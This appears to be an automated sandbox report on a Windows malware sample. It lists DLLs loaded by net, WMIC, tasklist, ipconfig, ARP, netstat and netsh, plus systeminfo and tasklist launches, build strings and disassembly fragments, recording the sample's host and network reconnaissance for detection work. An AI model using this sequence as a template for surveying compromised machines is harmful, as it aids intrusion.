            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\query.exeSection loaded: regapi.dll
            Source: C:\Windows\System32\quser.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\quser.exeSection loaded: utildll.dll
            Source: C:\Windows\System32\quser.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\quser.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: snmpapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: inetmib1.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ARP.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: snmpapi.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: inetmib1.dll
            Source: C:\Windows\System32\NETSTAT.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exeStatic file information: File size 9934907 > 1048576
            Source: Binary string: C:\A\34\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458402101.00007FFDA3AE1000.00000040.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460538535.00007FFDA5491000.00000040.00000001.01000000.0000000A.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459049746.00007FFDA4161000.00000040.00000001.01000000.0000000B.sdmp
            Source: Binary string: cryptography_rust.pdbc source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.FileRepMalware.22561.28030.exe
            Source: Binary string: C:\A\34\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456611424.00007FFDA32F1000.00000040.00000001.01000000.00000015.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdb source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: crypto\bn\bn_ctx.cBN_CTX_startBN_CTX_getossl_ec_group_new_excrypto\ec\ec_lib.cEC_GROUP_copyEC_GROUP_set_generatorEC_GROUP_set_curveEC_GROUP_get_curveEC_GROUP_get_degreeEC_GROUP_check_discriminantEC_POINT_newEC_POINT_copyEC_POINT_set_to_infinityEC_POINT_set_Jprojective_coordinates_GFpEC_POINT_set_affine_coordinatesEC_POINT_get_affine_coordinatesEC_POINT_addEC_POINT_dblEC_POINT_invertEC_POINT_is_at_infinityEC_POINT_is_on_curveEC_POINT_cmpEC_POINT_mulEC_GROUP_get_trinomial_basisEC_GROUP_get_pentanomial_basisgroup_new_from_nameossl_ec_group_set_paramsencodingdecoded-from-explicitEC_GROUP_new_from_paramsgeneratorcrypto\evp\digest.cevp_md_ctx_new_exevp_md_ctx_free_algctxevp_md_init_internalEVP_DigestUpdatesizeEVP_DigestFinal_exassertion failed: mdsize <= EVP_MAX_MD_SIZEEVP_DigestFinalXOFxoflenEVP_MD_CTX_copy_exEVP_MD_CTX_ctrlmicalgssl3-msblocksizexofalgid-absentevp_md_from_algorithmupdatecrypto\evp\m_sigver.cUNDEFdo_sigver_initEVP_DigestSignUpdateEVP_DigestVerifyUpdateEVP_DigestSignFinalEVP_DigestSignEVP_DigestVerifyFinalEVP_DigestVerifycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Fri Oct 18 00:15:00 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\user\tb_digest.cuser_get_digestcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459264735.00007FFDA4331000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458028141.00007FFDA3711000.00000040.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_asyncio.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458199558.00007FFDA3A81000.00000040.00000001.01000000.00000012.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460318251.00007FFDA5471000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457310056.00007FFDA3531000.00000040.00000001.01000000.0000000F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_overlapped.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459813174.00007FFDA4DA1000.00000040.00000001.01000000.00000013.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\python310.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
            Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdbhP source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458841393.00007FFDA3FD1000.00000040.00000001.01000000.00000023.sdmp
            Source: Binary string: cryptography_rust.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\_uuid.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459552942.00007FFDA4631000.00000040.00000001.01000000.0000001D.sdmp
            Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD94064460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD94064460
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: libffi-7.dll.0.drStatic PE information: section name: UPX2
            Source: _rust.pyd.0.drStatic PE information: section name: UPX2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6C31 push r10; ret 2_2_00007FFD93BF6C33
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6F42 push r12; ret 2_2_00007FFD93BF6F5A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6E54 push rdi; iretd 2_2_00007FFD93BF6E56
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6EE0 push r12; ret 2_2_00007FFD93BF6EFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6CFA push rdx; ret 2_2_00007FFD93BF6D01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF77FA push rsi; ret 2_2_00007FFD93BF7831
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BFA2F5 push rsp; retf 2_2_00007FFD93BFA2F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF92F4 push r10; retf 2_2_00007FFD93BF9360
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6E0B push rsp; ret 2_2_00007FFD93BF6E13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6D06 push r12; ret 2_2_00007FFD93BF6D08
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF9C12 push rsp; retf 2_2_00007FFD93BF9C13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF8F0E push r12; ret 2_2_00007FFD93BF8F35
